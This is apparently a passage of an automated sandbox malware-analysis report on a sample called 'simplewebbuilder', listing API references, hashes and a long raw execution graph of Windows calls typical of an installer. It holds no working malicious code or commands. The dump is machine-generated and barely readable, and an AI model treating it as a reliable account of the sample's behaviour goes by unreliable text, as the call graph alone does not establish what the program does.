                                                                                                                            • Instruction ID: a5b1b8df1821102690d7fb8594968cf0ea7132021cdad87ad1fe67fd01c07854
                                                                                                                            • Opcode Fuzzy Hash: 60fc00f971304cb9838920b848c7ffb86a9c4e4006143899e4e7b4dced6970d3
                                                                                                                            • Instruction Fuzzy Hash: D4E08631D596145BC3107B78EC094DBBBA49A85274F10872BFDA9832D1EE30995497C6
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 009B3BD8
                                                                                                                            • std::bad_exception::bad_exception.LIBCMT ref: 009B3BED
                                                                                                                              • Part of subcall function 009C2AB7: std::exception::exception.LIBCMT ref: 009C2AC1
                                                                                                                              • Part of subcall function 009BAC4D: __EH_prolog.LIBCMT ref: 009BAC52
                                                                                                                              • Part of subcall function 009BAC4D: __CxxThrowException@8.LIBCMT ref: 009BAC7B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                            • String ID: bad cast
                                                                                                                            • API String ID: 1300498068-3145022300
                                                                                                                            • Opcode ID: ca5bbce6f22d4d711e1cf1b14c4c5e265a7ef5ed00898ad615f9fba98ae6ac6a
                                                                                                                            • Instruction ID: 1955138562f235c3225e9805d067747d2c08da25db1492fd97bcaad474d1d066
                                                                                                                            • Opcode Fuzzy Hash: ca5bbce6f22d4d711e1cf1b14c4c5e265a7ef5ed00898ad615f9fba98ae6ac6a
                                                                                                                            • Instruction Fuzzy Hash: F3E09231940208DBC718EF58E642BA8BBB8EBA5310F00C1AEE80257391CB714A04CA82
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00403914,?,?,?,00000100,?,00000000), ref: 00403B74
                                                                                                                            • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00403914,?,?,?,00000100,?,00000000), ref: 00403BA8
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00403914,?,?,?,00000100,?,00000000), ref: 00403BC2
                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,00000000,00403914,?,?,?,00000100,?,00000000), ref: 00403BD9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocHeap$FreeVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3499195154-0
                                                                                                                            • Opcode ID: 3d2489dfb7edba8101981c13f95fc6febc3da7b0dfed5f0ee755b7708c58c99a
                                                                                                                            • Instruction ID: fcdd260894a6eddc8adf86aaa2b40ca1807c17f8388b21482d04f48ace73d9e8
                                                                                                                            • Opcode Fuzzy Hash: 3d2489dfb7edba8101981c13f95fc6febc3da7b0dfed5f0ee755b7708c58c99a
                                                                                                                            • Instruction Fuzzy Hash: 1B111630300206DFD720CF28EE85A227BB6FB897557104B39E592E69A1D771A945CF18
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:16.8%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:5%
                                                                                                                            Total number of Nodes:1282
                                                                                                                            Total number of Limit Nodes:21
                                                                                                                            execution_graph 3350 403141 3353 407c08 3350->3353 3354 403155 FindCloseChangeNotification 3353->3354 3910 402541 3911 401456 18 API calls 3910->3911 3912 40254d 3911->3912 3913 401456 18 API calls 3912->3913 3914 40255c 3913->3914 3915 402578 EnableWindow 3914->3915 3916 40256d ShowWindow 3914->3916 3917 4037d4 3915->3917 3916->3917 3918 401e43 3919 401456 18 API calls 3918->3919 3920 401e4f 3919->3920 3921 401456 18 API calls 3920->3921 3922 401e5e 3921->3922 3923 401400 18 API calls 3922->3923 3924 401e71 3923->3924 3929 401ee6 3924->3929 3931 407cde lstrlenA 3924->3931 3932 408d43 3936 408a96 3932->3936 3933 408cf0 3934 408b69 GlobalAlloc 3934->3933 3934->3936 3935 408b4d GlobalFree 3935->3934 3936->3933 3936->3934 3936->3935 3937 408c55 GlobalAlloc 3936->3937 3938 408c45 GlobalFree 3936->3938 3937->3933 3937->3936 3938->3937 3939 405c44 3940 405c8f 3939->3940 3941 405c6f 3939->3941 3943 405c9c GetDlgItem 3940->3943 3946 405d60 3940->3946 4004 407805 GetDlgItemTextA 3941->4004 3945 405cbc 3943->3945 3944 405c7f 3947 407d37 5 API calls 3944->3947 3951 405cd7 SetWindowTextA 3945->3951 3956 407935 3 API calls 3945->3956 3948 405c89 3946->3948 3953 407e06 18 API calls 3946->3953 3947->3948 3949 4060cd 3948->3949 4010 407805 GetDlgItemTextA 3948->4010 4028 404f0f 3949->4028 4005 404d65 3951->4005 3958 405dd9 SHBrowseForFolderA 3953->3958 3954 405eb6 3959 40815b 17 API calls 3954->3959 3961 405cc9 3956->3961 3958->3948 3963 405dfa CoTaskMemFree 3958->3963 3964 405ec0 3959->3964 3961->3951 3968 407cf2 3 API calls 3961->3968 3966 407cf2 3 API calls 3963->3966 4011 407cb6 lstrcpynA 3964->4011 3970 405e0c 3966->3970 3972 405cd6 3968->3972 3974 405e65 3970->3974 3978 407e06 18 API calls 3970->3978 3971 405edb 3975 408299 5 API calls 3971->3975 3972->3951 4009 4077fb SetDlgItemTextA 3974->4009 3983 405ee9 3975->3983 3979 405e34 lstrcmpiA 3978->3979 
3979->3974 3981 405e51 3979->3981 3980 405ef2 4012 407cb6 lstrcpynA 3980->4012 4008 407ce8 lstrcatA 3981->4008 3983->3980 3989 4078ce 2 API calls 3983->3989 3991 405f45 3983->3991 3985 405f02 3986 407935 3 API calls 3985->3986 3987 405f10 GetDiskFreeSpaceA 3986->3987 3990 405fb9 MulDiv 3987->3990 3987->3991 3989->3983 3990->3991 3992 406060 3991->3992 4013 404da2 3991->4013 3994 406099 3992->3994 3995 403903 2 API calls 3992->3995 4026 404d44 EnableWindow 3994->4026 3995->3994 3998 4060ba 3998->3949 4027 404d05 SendMessageA 3998->4027 4004->3944 4006 407e06 18 API calls 4005->4006 4007 404d8c 4006->4007 4010->3954 4011->3971 4012->3985 4014 404db5 4013->4014 4015 407e06 18 API calls 4014->4015 4016 404e3c 4015->4016 4017 407e06 18 API calls 4016->4017 4018 404e51 4017->4018 4019 407e06 18 API calls 4018->4019 4020 404e65 4019->4020 4042 407cde lstrlenA 4020->4042 4026->3998 4027->3949 4029 404f27 4028->4029 4030 404f2e GetWindowLongA 4028->4030 4030->4029 4031 404f4a 4030->4031 4032 404f52 GetSysColor 4031->4032 4033 404f5c 4031->4033 4032->4033 4034 404f71 SetBkMode 4033->4034 4035 404f62 SetTextColor 4033->4035 4036 404f9c 4034->4036 4037 404f8f GetSysColor 4034->4037 4035->4034 4038 404fa2 SetBkColor 4036->4038 4039 404fb4 4036->4039 4037->4036 4038->4039 4039->4029 4040 404fd1 CreateBrushIndirect 4039->4040 4041 404fc7 DeleteObject 4039->4041 4040->4029 4041->4040 4043 403747 4044 401456 18 API calls 4043->4044 4047 4036cd 4044->4047 4045 4037a0 4046 407e06 18 API calls 4045->4046 4048 402a3c 4045->4048 4046->4048 4047->4043 4047->4045 4047->4048 4049 404ec8 lstrcpynA 4052 407cde lstrlenA 4049->4052 4053 4023c9 GetDlgItem GetClientRect 4054 401400 18 API calls 4053->4054 4055 402419 LoadImageA SendMessageA 4054->4055 4056 40246e DeleteObject 4055->4056 4057 40382f 4055->4057 4056->4057 3876 402e4b 3877 402e51 3876->3877 3878 401400 18 API calls 3877->3878 3879 402e74 3878->3879 3880 401400 18 API calls 3879->3880 3881 402e87 RegCreateKeyExA 3880->3881 3882 
402ee4 3881->3882 3885 403677 3881->3885 3883 402f06 3882->3883 3884 402ee9 3882->3884 3887 402f24 3883->3887 3888 402f0b 3883->3888 3886 401400 18 API calls 3884->3886 3889 402ef5 3886->3889 3891 402f54 RegSetValueExA 3887->3891 3895 403d52 46 API calls 3887->3895 3897 401456 3888->3897 3896 407cde lstrlenA 3889->3896 3892 40307b RegCloseKey 3891->3892 3892->3885 3894 402f02 3894->3891 3895->3894 3898 407e06 18 API calls 3897->3898 3899 401477 3898->3899 4058 404a4c 4059 404a5e 4058->4059 4060 404a68 GlobalAlloc 4059->4060 4061 404a86 4059->4061 4060->4061 4062 4033cf FindClose 4063 401f51 4064 401400 18 API calls 4063->4064 4065 401f5d ExpandEnvironmentStringsA 4064->4065 4066 401f8a 4065->4066 4068 401f7c 4065->4068 4067 401f97 lstrcmpA 4066->4067 4066->4068 4067->4068 4069 4026d3 4070 401400 18 API calls 4069->4070 4071 4026df 4070->4071 4072 408123 2 API calls 4071->4072 4073 4026e8 4072->4073 4075 402704 4073->4075 4076 407be3 wsprintfA 4073->4076 4076->4075 4077 4016d4 4078 401cc4 4077->4078 4079 406fcb 23 API calls 4078->4079 4080 401cc9 4079->4080 4081 402bd6 4082 401400 18 API calls 4081->4082 4083 402be2 4082->4083 4084 401400 18 API calls 4083->4084 4085 402bf1 4084->4085 4086 401400 18 API calls 4085->4086 4087 402c00 4086->4087 4088 408123 2 API calls 4087->4088 4089 402c0b 4088->4089 4090 402c8d 4089->4090 4099 407cde lstrlenA 4089->4099 4091 406fcb 23 API calls 4090->4091 4097 402ca1 4091->4097 4107 406ed7 4108 406ef1 4107->4108 4109 406f0b 4107->4109 4108->4109 4110 406ef7 4108->4110 4111 406f13 IsWindowVisible 4109->4111 4112 406f31 4109->4112 4115 404bd7 SendMessageA 4110->4115 4113 406f21 4111->4113 4114 406f9d CallWindowProcA 4111->4114 4112->4114 4129 407cb6 lstrcpynA 4112->4129 4126 406557 SendMessageA 4113->4126 4117 406f03 4114->4117 4115->4117 4119 406f66 4130 407be3 wsprintfA 4119->4130 4121 406f78 4122 403903 2 API calls 4121->4122 4123 406f86 4122->4123 4131 407cb6 lstrcpynA 4123->4131 4125 406f9b 4125->4114 4127 4065db 4126->4127 4128 
406595 GetMessagePos ScreenToClient SendMessageA 4126->4128 4127->4112 4128->4127 4129->4119 4130->4121 4131->4125 4132 4037d8 SendMessageA 4133 40380d InvalidateRect 4132->4133 4134 40382c 4132->4134 4133->4134 4142 40395e 4143 403973 SetTimer 4142->4143 4144 403999 4142->4144 4143->4144 4145 4039f0 4144->4145 4149 40392c MulDiv 4144->4149 4147 4039a5 wsprintfA SetWindowTextA 4150 4077fb SetDlgItemTextA 4147->4150 4149->4147 3221 402860 3222 402869 3221->3222 3223 402970 3221->3223 3240 401400 3222->3240 3225 40163b 23 API calls 3223->3225 3227 402a3b 3225->3227 3228 401400 18 API calls 3229 402884 3228->3229 3230 402890 LoadLibraryExA 3229->3230 3231 4028b8 GetModuleHandleA 3229->3231 3230->3223 3232 4028b6 3230->3232 3231->3230 3233 4028c8 GetProcAddress 3231->3233 3232->3233 3234 40292d 3233->3234 3235 4028dd 3233->3235 3248 406fcb 3234->3248 3238 4028ef 3235->3238 3245 40163b 3235->3245 3238->3227 3239 402962 FreeLibrary 3238->3239 3239->3227 3262 407e06 3240->3262 3243 40144b 3243->3228 3246 406fcb 23 API calls 3245->3246 3247 401654 3246->3247 3247->3238 3249 4070f3 3248->3249 3250 406fe2 3248->3250 3249->3238 3251 407002 3250->3251 3252 407e06 18 API calls 3250->3252 3303 407cde lstrlenA 3251->3303 3252->3251 3274 407e16 3262->3274 3263 407ef9 3264 40143a 3263->3264 3291 407cb6 lstrcpynA 3263->3291 3264->3243 3281 407d37 3264->3281 3266 407f25 GetVersion 3275 407f34 3266->3275 3267 407ee3 lstrlenA 3267->3274 3271 407fbb GetSystemDirectoryA 3271->3275 3272 407e06 11 API calls 3272->3274 3273 407fe1 GetWindowsDirectoryA 3273->3275 3274->3263 3274->3266 3274->3267 3274->3272 3276 407d37 5 API calls 3274->3276 3290 407be3 wsprintfA 3274->3290 3297 407cb6 lstrcpynA 3274->3297 3298 407ce8 lstrcatA 3274->3298 3275->3271 3275->3273 3275->3274 3277 407e06 11 API calls 3275->3277 3278 408002 SHGetSpecialFolderLocation 3275->3278 3292 407b3a RegOpenKeyExA 3275->3292 3276->3274 3277->3275 3278->3275 3279 408069 SHGetPathFromIDListA CoTaskMemFree 3278->3279 3279->3275 
3283 407d48 3281->3283 3282 407dd5 3284 407dde CharPrevA 3282->3284 3285 407dfc 3282->3285 3283->3282 3286 407dc7 CharNextA 3283->3286 3288 407d9c CharNextA 3283->3288 3289 407db8 CharNextA 3283->3289 3299 4078a4 3283->3299 3284->3282 3285->3243 3286->3283 3288->3283 3289->3286 3290->3274 3291->3264 3293 407b81 RegQueryValueExA 3292->3293 3294 407bdc 3292->3294 3295 407bbc RegCloseKey 3293->3295 3294->3275 3295->3294 3297->3274 3300 4078b1 3299->3300 3301 4078c7 3300->3301 3302 4078bb CharNextA 3300->3302 3301->3283 3302->3300 3304 401860 3305 401400 18 API calls 3304->3305 3306 40186c 3305->3306 3323 407935 CharNextA CharNextA 3306->3323 3308 401902 3309 401942 3308->3309 3310 40190e 3308->3310 3314 40163b 23 API calls 3309->3314 3319 403677 3309->3319 3312 40163b 23 API calls 3310->3312 3311 4078a4 CharNextA 3322 401879 3311->3322 3313 40191a 3312->3313 3340 407cb6 lstrcpynA 3313->3340 3314->3319 3318 40192b SetCurrentDirectoryA 3318->3319 3320 4018dd GetFileAttributesA 3320->3322 3322->3308 3322->3311 3322->3320 3329 4082eb 3322->3329 3332 4076b0 CreateDirectoryA 3322->3332 3337 40774b CreateDirectoryA 3322->3337 3324 40795a 3323->3324 3325 407976 3324->3325 3326 4078a4 CharNextA 3324->3326 3325->3322 3327 40798a 3326->3327 3327->3325 3328 4078a4 CharNextA 3327->3328 3328->3325 3341 408299 GetModuleHandleA 3329->3341 3333 407710 3332->3333 3334 407714 GetLastError 3332->3334 3333->3322 3334->3333 3335 407723 SetFileSecurityA 3334->3335 3335->3333 3336 40773f GetLastError 3335->3336 3336->3333 3338 407775 3337->3338 3339 40776f GetLastError 3337->3339 3338->3322 3339->3338 3340->3318 3342 4082bb 3341->3342 3343 4082cc GetProcAddress 3341->3343 3347 40820e GetSystemDirectoryA 3342->3347 3344 4082e2 3343->3344 3344->3322 3346 4082c3 3346->3343 3346->3344 3348 40823c wsprintfA LoadLibraryExA 3347->3348 3348->3346 4151 4020e0 4152 40216e 4151->4152 4158 4020f0 4151->4158 4153 4021a1 GlobalAlloc 4152->4153 4154 402172 4152->4154 4156 407e06 18 API calls 4153->4156 
4169 402127 4154->4169 4172 407cb6 lstrcpynA 4154->4172 4155 402101 4159 407e06 18 API calls 4155->4159 4156->4169 4158->4155 4161 40212e 4158->4161 4162 402115 4159->4162 4160 402189 GlobalFree 4160->4169 4170 407cb6 lstrcpynA 4161->4170 4165 407836 MessageBoxIndirectA 4162->4165 4164 402141 4171 407cb6 lstrcpynA 4164->4171 4165->4169 4167 402157 4173 407cb6 lstrcpynA 4167->4173 4170->4164 4171->4167 4172->4160 4173->4169 4174 4021e3 4175 401456 18 API calls 4174->4175 4176 4021ef 4175->4176 4177 401456 18 API calls 4176->4177 4178 4021fe 4177->4178 4179 402216 4178->4179 4180 401400 18 API calls 4178->4180 4181 40222e 4179->4181 4182 401400 18 API calls 4179->4182 4180->4179 4183 402245 4181->4183 4184 4022c6 4181->4184 4182->4181 4185 401456 18 API calls 4183->4185 4186 401400 18 API calls 4184->4186 4188 40224a 4185->4188 4187 4022cb 4186->4187 4189 401400 18 API calls 4187->4189 4190 401456 18 API calls 4188->4190 4191 4022de FindWindowExA 4189->4191 4192 40225d 4190->4192 4196 402308 4191->4196 4193 4022a9 SendMessageA 4192->4193 4194 402269 SendMessageTimeoutA 4192->4194 4193->4196 4194->4196 4195 402332 4196->4195 4198 407be3 wsprintfA 4196->4198 4198->4195 3379 403164 3380 401400 18 API calls 3379->3380 3381 403170 3380->3381 3386 407a78 GetFileAttributesA CreateFileA 3381->3386 3383 402530 3385 40253c 3383->3385 3387 407be3 wsprintfA 3383->3387 3386->3383 3387->3385 3822 401ae6 3823 401400 18 API calls 3822->3823 3824 401af2 3823->3824 3825 401aff 3824->3825 3826 407ad4 2 API calls 3824->3826 3826->3825 4199 401968 4200 401400 18 API calls 4199->4200 4201 401974 4200->4201 4202 401400 18 API calls 4201->4202 4203 401983 4202->4203 4204 401400 18 API calls 4203->4204 4205 401992 MoveFileA 4204->4205 4206 4019b2 4205->4206 4207 4019a6 4205->4207 4208 408123 2 API calls 4206->4208 4211 402a3c 4206->4211 4209 40163b 23 API calls 4207->4209 4207->4211 4210 4019c7 4208->4210 4209->4211 4210->4211 4212 408311 39 API calls 4210->4212 4212->4207 4213 40236a 4214 
401456 18 API calls 4213->4214 4215 402376 4214->4215 4216 401456 18 API calls 4215->4216 4217 402385 GetDlgItem 4216->4217 4218 402530 4217->4218 4221 407be3 wsprintfA 4218->4221 4220 40253c 4221->4220 4222 4019ea 4223 401400 18 API calls 4222->4223 4224 4019f6 GetFullPathNameA 4223->4224 4225 401a25 4224->4225 4226 401a58 4224->4226 4225->4226 4229 408123 2 API calls 4225->4229 4227 403831 4226->4227 4228 401a7b GetShortPathNameA 4226->4228 4228->4227 4230 401a3e 4229->4230 4230->4226 4232 407cb6 lstrcpynA 4230->4232 4232->4226 4233 404fed 4234 405013 4233->4234 4235 405007 4233->4235 4237 405025 GetDlgItem GetDlgItem 4234->4237 4238 40509d 4234->4238 4235->4234 4236 40555f 4235->4236 4239 405564 SetWindowPos 4236->4239 4240 4055a6 4236->4240 4241 404d65 18 API calls 4237->4241 4242 4050c1 4238->4242 4248 403845 2 API calls 4238->4248 4244 4056a8 4239->4244 4245 4055ab ShowWindow 4240->4245 4246 4055cf 4240->4246 4247 405071 SetClassLongA 4241->4247 4243 404bd7 SendMessageA 4242->4243 4254 405134 4242->4254 4285 4050cd 4243->4285 4249 404f0f 8 API calls 4244->4249 4245->4244 4250 4055f1 4246->4250 4251 4055d7 DestroyWindow 4246->4251 4252 403903 2 API calls 4247->4252 4253 4050ef 4248->4253 4249->4254 4256 4055f6 SetWindowLongA 4250->4256 4257 40561c 4250->4257 4255 4053e3 4251->4255 4252->4238 4253->4242 4259 4050f5 SendMessageA 4253->4259 4255->4254 4262 40553d ShowWindow 4255->4262 4256->4254 4257->4244 4258 405628 GetDlgItem 4257->4258 4260 405650 SendMessageA IsWindowEnabled 4258->4260 4261 405641 4258->4261 4259->4254 4260->4254 4260->4261 4265 405693 4261->4265 4267 4056f7 SendMessageA 4261->4267 4269 4056b1 4261->4269 4275 405647 4261->4275 4262->4254 4263 40537a DestroyWindow EndDialog 4263->4255 4264 403903 2 API calls 4264->4285 4265->4267 4265->4275 4266 407e06 18 API calls 4266->4285 4267->4244 4270 4056d3 4269->4270 4271 4056ba 4269->4271 4273 403903 2 API calls 4270->4273 4274 403903 2 API calls 4271->4274 4272 404d65 18 API calls 4272->4285 
4273->4275 4274->4275 4275->4244 4302 404cc8 4275->4302 4276 404d65 18 API calls 4277 4051bc GetDlgItem 4276->4277 4278 4051e7 ShowWindow 4277->4278 4277->4285 4278->4285 4280 40525a EnableMenuItem SendMessageA 4281 4052af SendMessageA 4280->4281 4280->4285 4281->4285 4284 4053c8 DestroyWindow 4284->4255 4286 405407 CreateDialogParamA 4284->4286 4285->4254 4285->4263 4285->4264 4285->4266 4285->4272 4285->4276 4285->4278 4285->4280 4285->4284 4290 407e06 18 API calls 4285->4290 4298 404d44 EnableWindow 4285->4298 4299 404c96 SendMessageA 4285->4299 4300 407cb6 lstrcpynA 4285->4300 4301 407cde lstrlenA 4285->4301 4286->4255 4288 405448 4286->4288 4289 404d65 18 API calls 4288->4289 4291 40545f GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4289->4291 4292 405314 SetWindowTextA 4290->4292 4293 403845 2 API calls 4291->4293 4295 403845 2 API calls 4292->4295 4294 4054ee 4293->4294 4294->4254 4296 4054fd ShowWindow 4294->4296 4295->4285 4297 404bd7 SendMessageA 4296->4297 4297->4255 4298->4285 4299->4285 4300->4285 4303 404cd6 4302->4303 4304 404cdc SendMessageA 4302->4304 4303->4304 4304->4244 4305 401771 SetForegroundWindow 4306 40219b 4305->4306 4307 4033f2 4308 403401 4307->4308 4311 40345f 4307->4311 4309 40340f FindNextFileA 4308->4309 4310 403429 4309->4310 4309->4311 4310->4311 4313 407cb6 lstrcpynA 4310->4313 4313->4311 3396 404375 SetErrorMode GetVersion 3397 4043a7 3396->3397 3398 40439b 3396->3398 3400 4043d9 3397->3400 3402 40820e 3 API calls 3397->3402 3399 408299 5 API calls 3398->3399 3399->3397 3401 408299 5 API calls 3400->3401 3403 4043e5 3401->3403 3404 4043c8 lstrlenA 3402->3404 3405 408299 5 API calls 3403->3405 3404->3397 3406 4043f2 InitCommonControls OleInitialize SHGetFileInfoA 3405->3406 3492 407cb6 lstrcpynA 3406->3492 3408 404457 GetCommandLineA 3493 407cb6 lstrcpynA 3408->3493 3410 40446f GetModuleHandleA 3411 404494 3410->3411 3412 4078a4 CharNextA 3411->3412 3413 4044ac CharNextA 3412->3413 3422 4044be 3413->3422 3414 404560 
GetTempPathA 3494 4042bc 3414->3494 3417 404580 DeleteFileA 3503 403f03 GetTickCount GetModuleFileNameA 3417->3503 3418 4045a7 GetWindowsDirectoryA 3605 407ce8 lstrcatA 3418->3605 3421 4078a4 CharNextA 3421->3422 3422->3414 3422->3421 3425 404523 3422->3425 3424 4045dd 3595 404316 3424->3595 3604 407cb6 lstrcpynA 3425->3604 3431 40453d 3431->3414 3432 40465b 3533 4060fd 3432->3533 3433 40459a 3433->3424 3433->3432 3437 4078a4 CharNextA 3433->3437 3435 404844 3441 404836 ExitProcess 3435->3441 3442 408299 5 API calls 3435->3442 3436 404826 3623 407836 3436->3623 3439 404608 3437->3439 3444 404662 3439->3444 3446 40461c 3439->3446 3443 40485d 3442->3443 3445 408299 5 API calls 3443->3445 3447 4082eb 5 API calls 3444->3447 3448 40486c 3445->3448 3606 40815b 3446->3606 3450 404667 3447->3450 3451 408299 5 API calls 3448->3451 3622 407ce8 lstrcatA 3450->3622 3454 40487b 3451->3454 3460 4048a1 GetCurrentProcess 3454->3460 3470 4048be 3454->3470 3460->3470 3461 404649 3621 407cb6 lstrcpynA 3461->3621 3462 408299 5 API calls 3471 40493f 3462->3471 3465 404944 ExitWindowsEx 3465->3441 3467 404991 3465->3467 3627 403903 3467->3627 3470->3462 3471->3465 3471->3467 3492->3408 3493->3410 3495 407d37 5 API calls 3494->3495 3496 4042ce 3495->3496 3497 404312 3496->3497 3630 407cf2 lstrlenA CharPrevA 3496->3630 3497->3417 3497->3418 3500 40774b 2 API calls 3501 4042fd 3500->3501 3634 407ad4 3501->3634 3639 407a78 GetFileAttributesA CreateFileA 3503->3639 3505 403f5b 3532 404012 3505->3532 3640 407cb6 lstrcpynA 3505->3640 3507 403f87 3641 4078ce lstrlenA 3507->3641 3511 403fa8 GetFileSize 3530 403fce 3511->3530 3512 4040c3 3648 4039fe 3512->3648 3516 404006 3517 4039fe 31 API calls 3516->3517 3517->3532 3518 404172 GlobalAlloc 3519 404197 3518->3519 3523 407ad4 2 API calls 3519->3523 3521 4039fe 31 API calls 3521->3530 3522 404149 3524 403ae9 ReadFile 3522->3524 3526 4041a7 CreateFileA 3523->3526 3525 40415a 3524->3525 3525->3518 3525->3532 3527 4041f6 3526->3527 3526->3532 3664 
403b31 SetFilePointer 3527->3664 3529 404206 3665 403d52 3529->3665 3530->3512 3530->3516 3530->3521 3530->3532 3646 403ae9 ReadFile 3530->3646 3532->3433 3534 408299 5 API calls 3533->3534 3535 406117 3534->3535 3536 406136 3535->3536 3537 40611c 3535->3537 3538 407b3a 3 API calls 3536->3538 3710 407be3 wsprintfA 3537->3710 3539 40616c 3538->3539 3541 4061a4 3539->3541 3543 407b3a 3 API calls 3539->3543 3711 407ce8 lstrcatA 3541->3711 3542 406131 3701 404ae0 3542->3701 3543->3541 3547 40815b 17 API calls 3548 4061e5 3547->3548 3549 4062bc 3548->3549 3551 407b3a 3 API calls 3548->3551 3550 40815b 17 API calls 3549->3550 3552 4062ca 3550->3552 3553 406228 3551->3553 3554 4062e7 LoadImageA 3552->3554 3555 407e06 18 API calls 3552->3555 3553->3549 3559 40625a 3553->3559 3563 4078a4 CharNextA 3553->3563 3556 406405 3554->3556 3557 40632f RegisterClassA 3554->3557 3560 4062e5 3555->3560 3558 403903 2 API calls 3556->3558 3561 406374 SystemParametersInfoA CreateWindowExA 3557->3561 3593 40636d 3557->3593 3562 406411 3558->3562 3712 407cde lstrlenA 3559->3712 3560->3554 3561->3556 3566 404ae0 19 API calls 3562->3566 3562->3593 3563->3559 3570 406421 3566->3570 3573 406513 3570->3573 3574 40642e ShowWindow 3570->3574 3713 404c0d OleInitialize 3573->3713 3578 40820e 3 API calls 3574->3578 3581 406452 3578->3581 3580 40651f 3583 406541 3580->3583 3584 406524 3580->3584 3585 406464 GetClassInfoA 3581->3585 3586 40820e 3 API calls 3581->3586 3587 403903 2 API calls 3583->3587 3590 403903 2 API calls 3584->3590 3584->3593 3588 40648a GetClassInfoA RegisterClassA 3585->3588 3589 4064be DialogBoxParamA 3585->3589 3591 406463 3586->3591 3587->3593 3588->3589 3592 403903 2 API calls 3589->3592 3590->3593 3591->3585 3594 406504 3592->3594 3593->3424 3594->3593 3596 404326 CloseHandle 3595->3596 3597 40433a 3595->3597 3596->3597 3598 404344 CloseHandle 3597->3598 3599 404358 3597->3599 3598->3599 3724 4049da 3599->3724 3604->3431 3815 407cb6 lstrcpynA 3606->3815 3608 408176 3609 
407935 3 API calls 3608->3609 3610 408184 3609->3610 3611 40462a 3610->3611 3612 407d37 5 API calls 3610->3612 3611->3424 3620 407cb6 lstrcpynA 3611->3620 3615 408197 3612->3615 3613 4081b7 lstrlenA 3614 4081ea 3613->3614 3613->3615 3617 407cf2 3 API calls 3614->3617 3615->3611 3615->3613 3616 408123 2 API calls 3615->3616 3619 4078ce 2 API calls 3615->3619 3616->3615 3618 4081ef GetFileAttributesA 3617->3618 3618->3611 3619->3615 3620->3461 3621->3432 3624 407850 3623->3624 3625 407855 MessageBoxIndirectA 3623->3625 3624->3625 3626 4078a0 3624->3626 3625->3626 3626->3441 3628 403845 2 API calls 3627->3628 3629 403925 3628->3629 3629->3441 3631 407d1c 3630->3631 3632 4042f0 3630->3632 3638 407ce8 lstrcatA 3631->3638 3632->3500 3635 407ae8 3634->3635 3636 407aeb GetTickCount GetTempFileNameA 3635->3636 3637 407b27 3635->3637 3636->3635 3636->3637 3637->3497 3639->3505 3640->3507 3642 4078e4 3641->3642 3643 4078e9 CharPrevA 3642->3643 3644 403f97 3642->3644 3643->3642 3643->3644 3645 407cb6 lstrcpynA 3644->3645 3645->3511 3647 403b22 3646->3647 3647->3530 3649 403a0b 3648->3649 3650 403a2d 3648->3650 3651 403a14 DestroyWindow 3649->3651 3652 403a1e 3649->3652 3653 403a36 3650->3653 3654 403a48 GetTickCount 3650->3654 3651->3652 3652->3518 3652->3532 3663 403b31 SetFilePointer 3652->3663 3655 408848 2 API calls 3653->3655 3654->3652 3656 403a5a 3654->3656 3655->3652 3657 403a9b CreateDialogParamA ShowWindow 3656->3657 3658 403a63 3656->3658 3659 403a99 3657->3659 3658->3652 3679 40392c MulDiv 3658->3679 3659->3652 3661 403a74 wsprintfA 3662 406fcb 23 API calls 3661->3662 3662->3659 3663->3522 3664->3529 3666 403d92 3665->3666 3667 403d62 SetFilePointer 3665->3667 3680 403b63 GetTickCount 3666->3680 3667->3666 3670 403ea8 3670->3532 3671 403da9 ReadFile 3671->3670 3672 403de2 3671->3672 3672->3670 3673 403b63 41 API calls 3672->3673 3674 403dfe 3673->3674 3674->3670 3675 403eba ReadFile 3674->3675 3677 403e15 3674->3677 3675->3670 3676 403e6b ReadFile 3676->3670 
3676->3677 3677->3670 3677->3676 3678 403e23 WriteFile 3677->3678 3678->3670 3678->3677 3679->3661 3681 403b93 3680->3681 3682 403d35 3680->3682 3693 403b31 SetFilePointer 3681->3693 3683 4039fe 31 API calls 3682->3683 3687 403cec 3683->3687 3685 403ba3 SetFilePointer 3692 403be3 3685->3692 3686 403ae9 ReadFile 3686->3692 3687->3670 3687->3671 3689 4039fe 31 API calls 3689->3692 3690 403c98 WriteFile 3690->3687 3690->3692 3691 403d13 SetFilePointer 3691->3682 3692->3686 3692->3687 3692->3689 3692->3690 3692->3691 3694 40893d 3692->3694 3693->3685 3695 408cf0 3694->3695 3698 40896b 3694->3698 3695->3692 3696 408b69 GlobalAlloc 3696->3695 3696->3698 3697 408b4d GlobalFree 3697->3696 3698->3695 3698->3696 3698->3697 3699 408c55 GlobalAlloc 3698->3699 3700 408c45 GlobalFree 3698->3700 3699->3695 3699->3698 3700->3699 3702 404af5 3701->3702 3720 407be3 wsprintfA 3702->3720 3704 404b73 3705 407e06 18 API calls 3704->3705 3706 404b89 SetWindowTextA 3705->3706 3707 404bad 3706->3707 3708 404bcf 3707->3708 3709 407e06 18 API calls 